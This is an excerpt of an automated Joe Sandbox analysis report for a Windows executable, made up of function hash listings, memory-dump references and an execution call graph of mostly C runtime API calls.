                                                                                        • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                        • Instruction Fuzzy Hash: BB41A232A08B52A5F714EF26F4640BCB794FB487A1F956075EA4D07785DE3CD8518320
                                                                                        Function 00007FF7CA7AF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                        • String ID: .$:
                                                                                        • API String ID: 2020911589-4202072812
                                                                                        • Opcode ID: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                        • Instruction ID: 1db88adb828be7b3f4c48f694c766db4d2506477b4105a52a8d3b04ec76143bf
                                                                                        • Opcode Fuzzy Hash: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                        • Instruction Fuzzy Hash: 6D417422F04752A8FB10AFB2A8601FD66747F1876AF945075DE4D67A45DF3898528330
                                                                                        Function 00007FF7CA7ABF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID: U
                                                                                        • API String ID: 442123175-4171548499
                                                                                        • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                        • Instruction ID: 7730edcb684de68da329bd4dbba243d779595bcca75de203f7b66ee5435f2b33
                                                                                        • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                        • Instruction Fuzzy Hash: F141D622B18A4191EB209F26F8547AAB760FB9CBA5F844031EE4D87788DF3CD841C750
                                                                                        Function 00007FF7CA7AE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID: :
                                                                                        • API String ID: 1611563598-336475711
                                                                                        • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                        • Instruction ID: 7ee8170424348065bc7eb0f21b00bc8b3f346efef48bd003fae74fbf7b1c1e23
                                                                                        • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                        • Instruction Fuzzy Hash: 8D21EE62A0878192FB60AF16E06427DB3B1FB8CB56FC59075DA8C43284DF7CE9448762
                                                                                        Function 00007FF7CA79F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 2573137834-1018135373
                                                                                        • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                        • Instruction ID: c79f2b3a154565a927c3bdde555c7f6a4bff77f11a5a71ea7f460b7802aae189
                                                                                        • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                        • Instruction Fuzzy Hash: FA114936619B8482EB219F2AF45066DB7E4FB8CB95F984271DE8D07768DF3CC9518B00
                                                                                        Function 00007FF7CA7AFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                        • String ID: :
                                                                                        • API String ID: 2595371189-336475711
                                                                                        • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                        • Instruction ID: d0d91e3e2fe1d395c71b21dd748adfa5d8434768c1c9ec609554168318c0a5b1
                                                                                        • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                        • Instruction Fuzzy Hash: F901D42291C20295FB20BF62B4712BEA3A0FF4D72AFC02075D54C42291DF3CD804CA30

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.4%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:816
                                                                                        Total number of Limit Nodes:24
                                                                                        execution_graph 55616 7ff7ca792d00 55617 7ff7ca792d10 55616->55617 55618 7ff7ca792d61 55617->55618 55619 7ff7ca792d4b 55617->55619 55621 7ff7ca792d81 55618->55621 55632 7ff7ca792d97 __vcrt_freefls 55618->55632 55672 7ff7ca7925f0 53 API calls _log10_special 55619->55672 55673 7ff7ca7925f0 53 API calls _log10_special 55621->55673 55624 7ff7ca792d57 __vcrt_freefls 55674 7ff7ca79b870 55624->55674 55627 7ff7ca793069 55689 7ff7ca7925f0 53 API calls _log10_special 55627->55689 55630 7ff7ca793053 55688 7ff7ca7925f0 53 API calls _log10_special 55630->55688 55632->55624 55632->55627 55632->55630 55633 7ff7ca79302d 55632->55633 55635 7ff7ca792f27 55632->55635 55644 7ff7ca791440 55632->55644 55668 7ff7ca791bf0 55632->55668 55687 7ff7ca7925f0 53 API calls _log10_special 55633->55687 55636 7ff7ca792f93 55635->55636 55683 7ff7ca7a9714 37 API calls 2 library calls 55635->55683 55638 7ff7ca792fb0 55636->55638 55639 7ff7ca792fbe 55636->55639 55684 7ff7ca7a9714 37 API calls 2 library calls 55638->55684 55685 7ff7ca792af0 37 API calls 55639->55685 55642 7ff7ca792fbc 55686 7ff7ca792470 54 API calls __vcrt_freefls 55642->55686 55690 7ff7ca793f70 55644->55690 55647 7ff7ca79146b 55726 7ff7ca7925f0 53 API calls _log10_special 55647->55726 55648 7ff7ca79148c 55700 7ff7ca79f9f4 55648->55700 55651 7ff7ca79147b 55651->55632 55652 7ff7ca7914a1 55653 7ff7ca7914c1 55652->55653 55654 7ff7ca7914a5 55652->55654 55656 7ff7ca7914f1 55653->55656 55657 7ff7ca7914d1 55653->55657 55727 7ff7ca792760 53 API calls 2 library calls 55654->55727 55659 7ff7ca7914f7 55656->55659 55665 7ff7ca79150a 55656->55665 55728 7ff7ca792760 53 API calls 2 library calls 55657->55728 55704 7ff7ca7911f0 55659->55704 55661 7ff7ca791584 55661->55632 55663 7ff7ca7914bc __vcrt_freefls 55722 7ff7ca79f36c 55663->55722 55665->55663 55666 7ff7ca791596 55665->55666 55729 7ff7ca79f6bc 55665->55729 55732 7ff7ca792760 53 API calls 2 library calls 55666->55732 55669 7ff7ca791c15 55668->55669 55974 7ff7ca7a3ca4 55669->55974 55672->55624 55673->55624 55675 7ff7ca79b879 55674->55675 55676 7ff7ca79bc00 IsProcessorFeaturePresent 55675->55676 55677 7ff7ca792f1a 55675->55677 55678 7ff7ca79bc18 55676->55678 56001 7ff7ca79bdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 55678->56001 55680 7ff7ca79bc2b 56002 7ff7ca79bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55680->56002 55683->55636 55684->55642 55685->55642 55686->55624 55687->55624 55688->55624 55689->55624 55691 7ff7ca793f7c 55690->55691 55733 7ff7ca7986b0 55691->55733 55693 7ff7ca793fa4 55694 7ff7ca7986b0 2 API calls 55693->55694 55695 7ff7ca793fb7 55694->55695 55738 7ff7ca7a52a4 55695->55738 55698 7ff7ca79b870 _log10_special 8 API calls 55699 7ff7ca791463 55698->55699 55699->55647 55699->55648 55701 7ff7ca79fa24 55700->55701 55909 7ff7ca79f784 55701->55909 55703 7ff7ca79fa3d 55703->55652 55705 7ff7ca791248 55704->55705 55706 7ff7ca79124f 55705->55706 55707 7ff7ca791277 55705->55707 55926 7ff7ca7925f0 53 API calls _log10_special 55706->55926 55710 7ff7ca791291 55707->55710 55711 7ff7ca7912ad 55707->55711 55709 7ff7ca791262 55709->55663 55927 7ff7ca792760 53 API calls 2 library calls 55710->55927 55713 7ff7ca7912bf 55711->55713 55721 7ff7ca7912db memcpy_s 55711->55721 55928 7ff7ca792760 53 API calls 2 library calls 55713->55928 55715 7ff7ca79f6bc _fread_nolock 53 API calls 55715->55721 55716 7ff7ca79f430 37 API calls 55716->55721 55717 7ff7ca7912a8 __vcrt_freefls 55717->55663 55718 7ff7ca79139f 55929 7ff7ca7925f0 53 API calls _log10_special 55718->55929 55721->55715 55721->55716 55721->55717 55721->55718 55922 7ff7ca79fdfc 55721->55922 55723 7ff7ca79f39c 55722->55723 55946 7ff7ca79f148 55723->55946 55725 7ff7ca79f3b5 55725->55661 55726->55651 55727->55663 55728->55663 55958 7ff7ca79f6dc 55729->55958 55732->55663 55734 7ff7ca7986d2 MultiByteToWideChar 55733->55734 55735 7ff7ca7986f6 55733->55735 55734->55735 55737 7ff7ca79870c __vcrt_freefls 55734->55737 55736 7ff7ca798713 MultiByteToWideChar 55735->55736 55735->55737 55736->55737 55737->55693 55739 7ff7ca7a51d8 55738->55739 55740 7ff7ca7a51fe 55739->55740 55742 7ff7ca7a5231 55739->55742 55769 7ff7ca7a43f4 11 API calls _get_daylight 55740->55769 55744 7ff7ca7a5244 55742->55744 55745 7ff7ca7a5237 55742->55745 55743 7ff7ca7a5203 55770 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55743->55770 55757 7ff7ca7a9f38 55744->55757 55771 7ff7ca7a43f4 11 API calls _get_daylight 55745->55771 55749 7ff7ca793fc6 55749->55698 55751 7ff7ca7a5265 55764 7ff7ca7af1dc 55751->55764 55752 7ff7ca7a5258 55772 7ff7ca7a43f4 11 API calls _get_daylight 55752->55772 55755 7ff7ca7a5278 55773 7ff7ca7a4788 LeaveCriticalSection 55755->55773 55774 7ff7ca7af5e8 EnterCriticalSection 55757->55774 55759 7ff7ca7a9f4f 55760 7ff7ca7a9fac 19 API calls 55759->55760 55761 7ff7ca7a9f5a 55760->55761 55762 7ff7ca7af648 _isindst LeaveCriticalSection 55761->55762 55763 7ff7ca7a524e 55762->55763 55763->55751 55763->55752 55775 7ff7ca7aeed8 55764->55775 55767 7ff7ca7af236 55767->55755 55769->55743 55770->55749 55771->55749 55772->55749 55776 7ff7ca7aef13 __vcrt_InitializeCriticalSectionEx 55775->55776 55785 7ff7ca7af0da 55776->55785 55790 7ff7ca7a6d4c 51 API calls 3 library calls 55776->55790 55778 7ff7ca7af1b1 55794 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55778->55794 55780 7ff7ca7af0e3 55780->55767 55787 7ff7ca7b6064 55780->55787 55782 7ff7ca7af145 55782->55785 55791 7ff7ca7a6d4c 51 API calls 3 library calls 55782->55791 55784 7ff7ca7af164 55784->55785 55792 7ff7ca7a6d4c 51 API calls 3 library calls 55784->55792 55785->55780 55793 7ff7ca7a43f4 11 API calls _get_daylight 55785->55793 55795 7ff7ca7b5664 55787->55795 55790->55782 55791->55784 55792->55785 55793->55778 55794->55780 55796 7ff7ca7b5699 55795->55796 55797 7ff7ca7b567b 55795->55797 55796->55797 55800 7ff7ca7b56b5 55796->55800 55849 7ff7ca7a43f4 11 API calls _get_daylight 55797->55849 55799 7ff7ca7b5680 55850 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55799->55850 55806 7ff7ca7b5c74 55800->55806 55803 7ff7ca7b568c 55803->55767 55852 7ff7ca7b59a8 55806->55852 55809 7ff7ca7b5d01 55871 7ff7ca7a7830 55809->55871 55810 7ff7ca7b5ce9 55883 7ff7ca7a43d4 11 API calls _get_daylight 55810->55883 55814 7ff7ca7b5cee 55884 7ff7ca7a43f4 11 API calls _get_daylight 55814->55884 55842 7ff7ca7b56e0 55842->55803 55851 7ff7ca7a7808 LeaveCriticalSection 55842->55851 55849->55799 55850->55803 55853 7ff7ca7b59d4 55852->55853 55859 7ff7ca7b59ee 55852->55859 55853->55859 55896 7ff7ca7a43f4 11 API calls _get_daylight 55853->55896 55855 7ff7ca7b59e3 55897 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55855->55897 55857 7ff7ca7b5abd 55869 7ff7ca7b5b1a 55857->55869 55902 7ff7ca7a8e90 37 API calls 2 library calls 55857->55902 55858 7ff7ca7b5a6c 55858->55857 55900 7ff7ca7a43f4 11 API calls _get_daylight 55858->55900 55859->55858 55898 7ff7ca7a43f4 11 API calls _get_daylight 55859->55898 55863 7ff7ca7b5ab2 55901 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55863->55901 55864 7ff7ca7b5b16 55864->55869 55903 7ff7ca7a9c10 IsProcessorFeaturePresent 55864->55903 55865 7ff7ca7b5a61 55899 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55865->55899 55869->55809 55869->55810 55908 7ff7ca7af5e8 EnterCriticalSection 55871->55908 55883->55814 55884->55842 55896->55855 55897->55859 55898->55865 55899->55858 55900->55863 55901->55857 55902->55864 55904 7ff7ca7a9c23 55903->55904 55907 7ff7ca7a9924 14 API calls 3 library calls 55904->55907 55906 7ff7ca7a9c3e GetCurrentProcess TerminateProcess 55907->55906 55910 7ff7ca79f7ee 55909->55910 55911 7ff7ca79f7ae 55909->55911 55910->55911 55913 7ff7ca79f7fa 55910->55913 55921 7ff7ca7a9b24 37 API calls 2 library calls 55911->55921 55920 7ff7ca7a477c EnterCriticalSection 55913->55920 55915 7ff7ca79f7ff 55916 7ff7ca79f908 71 API calls 55915->55916 55917 7ff7ca79f811 55916->55917 55918 7ff7ca7a4788 _fread_nolock LeaveCriticalSection 55917->55918 55919 7ff7ca79f7d5 55918->55919 55919->55703 55921->55919 55923 7ff7ca79fe2c 55922->55923 55930 7ff7ca79fb4c 55923->55930 55925 7ff7ca79fe4a 55925->55721 55926->55709 55927->55717 55928->55717 55929->55717 55931 7ff7ca79fb6c 55930->55931 55936 7ff7ca79fb99 55930->55936 55932 7ff7ca79fba1 55931->55932 55933 7ff7ca79fb76 55931->55933 55931->55936 55937 7ff7ca79fa8c 55932->55937 55944 7ff7ca7a9b24 37 API calls 2 library calls 55933->55944 55936->55925 55945 7ff7ca7a477c EnterCriticalSection 55937->55945 55939 7ff7ca79faa9 55940 7ff7ca79facc 74 API calls 55939->55940 55941 7ff7ca79fab2 55940->55941 55942 7ff7ca7a4788 _fread_nolock LeaveCriticalSection 55941->55942 55943 7ff7ca79fabd 55942->55943 55943->55936 55944->55936 55947 7ff7ca79f163 55946->55947 55949 7ff7ca79f191 55946->55949 55957 7ff7ca7a9b24 37 API calls 2 library calls 55947->55957 55950 7ff7ca79f183 55949->55950 55956 7ff7ca7a477c EnterCriticalSection 55949->55956 55950->55725 55952 7ff7ca79f1a8 55953 7ff7ca79f1c4 72 API calls 55952->55953 55954 7ff7ca79f1b4 55953->55954 55955 7ff7ca7a4788 _fread_nolock LeaveCriticalSection 55954->55955 55955->55950 55957->55950 55959 7ff7ca79f706 55958->55959 55970 7ff7ca79f6d4 55958->55970 55960 7ff7ca79f752 55959->55960 55961 7ff7ca79f715 __scrt_get_show_window_mode 55959->55961 55959->55970 55971 7ff7ca7a477c EnterCriticalSection 55960->55971 55972 7ff7ca7a43f4 11 API calls _get_daylight 55961->55972 55963 7ff7ca79f75a 55965 7ff7ca79f45c _fread_nolock 51 API calls 55963->55965 55967 7ff7ca79f771 55965->55967 55966 7ff7ca79f72a 55973 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 55966->55973 55969 7ff7ca7a4788 _fread_nolock LeaveCriticalSection 55967->55969 55969->55970 55970->55665 55972->55966 55973->55970 55978 7ff7ca7a3cfe 55974->55978 55975 7ff7ca7a3d23 55992 7ff7ca7a9b24 37 API calls 2 library calls 55975->55992 55977 7ff7ca7a3d5f 55993 7ff7ca7a1f30 49 API calls _invalid_parameter_noinfo 55977->55993 55978->55975 55978->55977 55980 7ff7ca7a3df6 55984 7ff7ca7a3e3c 55980->55984 55985 7ff7ca7a3e60 55980->55985 55986 7ff7ca7a3e11 55980->55986 55989 7ff7ca7a3e08 55980->55989 55981 7ff7ca79b870 _log10_special 8 API calls 55983 7ff7ca791c38 55981->55983 55982 7ff7ca7a9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 55991 7ff7ca7a3d4d 55982->55991 55983->55632 55984->55982 55985->55984 55987 7ff7ca7a3e6a 55985->55987 55994 7ff7ca7a9c58 55986->55994 55990 7ff7ca7a9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 55987->55990 55989->55984 55989->55986 55990->55991 55991->55981 55992->55991 55993->55980 55995 7ff7ca7a9c5d HeapFree 55994->55995 55999 7ff7ca7a9c8c 55994->55999 55996 7ff7ca7a9c78 GetLastError 55995->55996 55995->55999 55997 7ff7ca7a9c85 Concurrency::details::SchedulerProxy::DeleteThis 55996->55997 56000 7ff7ca7a43f4 11 API calls _get_daylight 55997->56000 55999->55991 56000->55999 56001->55680 56003 7ff8b8316110 56004 7ff8b8316138 56003->56004 56005 7ff8b8316124 56003->56005 56057 7ff8b834a4a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 56004->56057 56007 7ff8b8316161 56005->56007 56016 7ff8b831626c 56005->56016 56008 7ff8b831616a 56007->56008 56009 7ff8b8316211 56007->56009 56011 7ff8b83161e9 56008->56011 56012 7ff8b831616f GetLastError 56008->56012 56050 7ff8b83176f0 56009->56050 56010 7ff8b83161d5 56011->56010 56017 7ff8b83161f9 56011->56017 56014 7ff8b831621a 56012->56014 56015 7ff8b8316186 56012->56015 56061 7ff8b83162cc 56014->56061 56058 7ff8b8313a40 6 API calls _handle_error 56015->56058 56016->56010 56085 7ff8b83177ec 117 API calls 56016->56085 56060 7ff8b8313a40 6 API calls _handle_error 56017->56060 56022 7ff8b831618b 56022->56014 56026 7ff8b8316197 56022->56026 56024 7ff8b83162b7 SetLastError 56024->56010 56025 7ff8b83161fe 56025->56010 56030 7ff8b83162cc memcpy_s 6 API calls 56025->56030 56026->56024 56028 7ff8b83161a1 56026->56028 56028->56024 56031 7ff8b83161aa 56028->56031 56034 7ff8b83533ef 56030->56034 56059 7ff8b8313a40 6 API calls _handle_error 56031->56059 56032 7ff8b8316248 56038 7ff8b83162cc memcpy_s 6 API calls 56032->56038 56033 7ff8b83162a9 56037 7ff8b83162cc memcpy_s 6 API calls 56033->56037 56087 7ff8b831f930 29 API calls __free_lconv_mon 56034->56087 56036 7ff8b83161b5 SetLastError 56036->56010 56040 7ff8b83161d0 56036->56040 56041 7ff8b83162b0 56037->56041 56042 7ff8b8316250 56038->56042 56040->56010 56086 7ff8b830f040 25 API calls 2 library calls 56041->56086 56043 7ff8b8316258 56042->56043 56044 7ff8b8353408 56042->56044 56083 7ff8b83163a4 25 API calls memcpy_s 56043->56083 56047 7ff8b83162cc memcpy_s 6 API calls 56044->56047 56047->56041 56048 7ff8b8316260 56084 7ff8b830f040 25 API calls 2 library calls 56048->56084 56088 7ff8b834967c 56050->56088 56052 7ff8b8317704 56054 7ff8b831773d 56052->56054 56096 7ff8b8316fd0 56052->56096 56055 7ff8b8317746 56054->56055 56132 7ff8b83496bc 8 API calls 3 library calls 56054->56132 56055->56010 56057->56005 56058->56022 56059->56036 56060->56025 56062 7ff8b831630c 56061->56062 56063 7ff8b8353475 TlsSetValue 56061->56063 56065 7ff8b8316223 56062->56065 56066 7ff8b831634b GetProcAddress 56062->56066 56069 7ff8b835344a 56062->56069 56173 7ff8b831bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56062->56173 56065->56024 56070 7ff8b830dcf0 56065->56070 56067 7ff8b8353455 56066->56067 56068 7ff8b8316367 56066->56068 56067->56063 56068->56063 56068->56065 56069->56066 56069->56067 56071 7ff8b830dd01 56070->56071 56072 7ff8b830dd16 HeapAlloc 56070->56072 56071->56072 56073 7ff8b8350f6e 56071->56073 56074 7ff8b8350f80 56072->56074 56076 7ff8b830dd47 56072->56076 56174 7ff8b8313440 25 API calls 2 library calls 56073->56174 56078 7ff8b8350fb9 56074->56078 56082 7ff8b8350f9f HeapAlloc 56074->56082 56175 7ff8b8303964 8 API calls _handle_error 56074->56175 56176 7ff8b836c860 10 API calls memcpy_s 56074->56176 56076->56032 56076->56033 56177 7ff8b8313440 25 API calls 2 library calls 56078->56177 56081 7ff8b8350fc3 56082->56074 56082->56078 56083->56048 56084->56028 56085->56010 56086->56024 56087->56040 56089 7ff8b8349685 __vcrt_initialize_winapi_thunks 56088->56089 56133 7ff8b8349c98 56089->56133 56092 7ff8b8349698 56092->56052 56094 7ff8b83496a1 56094->56092 56140 7ff8b8349d04 DeleteCriticalSection 56094->56140 56157 7ff8b8317624 56096->56157 56099 7ff8b8317049 56099->56052 56100 7ff8b8316ff7 GetLastError 56101 7ff8b8317009 56100->56101 56102 7ff8b8317054 56100->56102 56166 7ff8b8313a40 6 API calls _handle_error 56101->56166 56103 7ff8b83162cc memcpy_s 6 API calls 56102->56103 56105 7ff8b831705d 56103->56105 56107 7ff8b831708c SetLastError 56105->56107 56110 7ff8b830dcf0 memcpy_s 25 API calls 56105->56110 56106 7ff8b831700e 56106->56102 56108 7ff8b831701a 56106->56108 56109 7ff8b8317094 56107->56109 56108->56107 56131 7ff8b8317020 56108->56131 56169 7ff8b836d140 6 API calls 56109->56169 56113 7ff8b8317070 56110->56113 56111 7ff8b8317025 56167 7ff8b8313a40 6 API calls _handle_error 56111->56167 56115 7ff8b831707e 56113->56115 56116 7ff8b831709f 56113->56116 56119 7ff8b83162cc memcpy_s 6 API calls 56115->56119 56118 7ff8b83162cc memcpy_s 6 API calls 56116->56118 56117 7ff8b8317030 SetLastError 56117->56109 56120 7ff8b8317047 56117->56120 56121 7ff8b83170a7 56118->56121 56122 7ff8b8317085 56119->56122 56120->56099 56123 7ff8b83170af 56121->56123 56124 7ff8b83534f3 56121->56124 56168 7ff8b830f040 25 API calls 2 library calls 56122->56168 56170 7ff8b83163a4 25 API calls memcpy_s 56123->56170 56127 7ff8b83162cc memcpy_s 6 API calls 56124->56127 56129 7ff8b8353500 56127->56129 56128 7ff8b83170b7 56171 7ff8b830f040 25 API calls 2 library calls 56128->56171 56131->56107 56131->56111 56132->56054 56134 7ff8b8349ca0 56133->56134 56136 7ff8b8349cd1 56134->56136 56137 7ff8b8349694 56134->56137 56141 7ff8b834a0a0 56134->56141 56146 7ff8b8349d04 DeleteCriticalSection 56136->56146 56137->56092 56139 7ff8b8349854 8 API calls 2 library calls 56137->56139 56139->56094 56140->56092 56147 7ff8b8349d88 56141->56147 56144 7ff8b834a0eb InitializeCriticalSectionAndSpinCount 56145 7ff8b834a0e0 56144->56145 56145->56134 56146->56137 56148 7ff8b8349de9 56147->56148 56155 7ff8b8349de4 try_get_function 56147->56155 56148->56144 56148->56145 56149 7ff8b8349ecc 56149->56148 56152 7ff8b8349eda GetProcAddress 56149->56152 56150 7ff8b8349e18 LoadLibraryExW 56151 7ff8b8349e39 GetLastError 56150->56151 56150->56155 56151->56155 56153 7ff8b8349eeb 56152->56153 56153->56148 56154 7ff8b8349eb1 FreeLibrary 56154->56155 56155->56148 56155->56149 56155->56150 56155->56154 56156 7ff8b8349e73 LoadLibraryExW 56155->56156 56156->56155 56158 7ff8b83176df TlsAlloc 56157->56158 56160 7ff8b831765d 56157->56160 56159 7ff8b8316fe6 56158->56159 56159->56099 56159->56100 56160->56159 56162 7ff8b8317695 GetProcAddress 56160->56162 56165 7ff8b835361c 56160->56165 56172 7ff8b831bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56160->56172 56163 7ff8b83176b1 56162->56163 56164 7ff8b8353627 56162->56164 56163->56158 56163->56159 56164->56158 56165->56162 56165->56164 56166->56106 56167->56117 56168->56107 56169->56099 56170->56128 56171->56131 56172->56160 56173->56062 56174->56076 56175->56074 56176->56074 56177->56081 56178 7ff7ca7a4938 56179 7ff7ca7a496f 56178->56179 56180 7ff7ca7a4952 56178->56180 56179->56180 56181 7ff7ca7a4982 CreateFileW 56179->56181 56229 7ff7ca7a43d4 11 API calls _get_daylight 56180->56229 56183 7ff7ca7a49b6 56181->56183 56184 7ff7ca7a49ec 56181->56184 56203 7ff7ca7a4a8c GetFileType 56183->56203 56232 7ff7ca7a4f14 46 API calls 3 library calls 56184->56232 56185 7ff7ca7a4957 56230 7ff7ca7a43f4 11 API calls _get_daylight 56185->56230 56190 7ff7ca7a49f1 56195 7ff7ca7a4a20 56190->56195 56196 7ff7ca7a49f5 56190->56196 56191 7ff7ca7a495f 56231 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 56191->56231 56193 7ff7ca7a49e1 CloseHandle 56198 7ff7ca7a496a 56193->56198 56194 7ff7ca7a49cb CloseHandle 56194->56198 56234 7ff7ca7a4cd4 56195->56234 56233 7ff7ca7a4368 11 API calls 2 library calls 56196->56233 56202 7ff7ca7a49ff 56202->56198 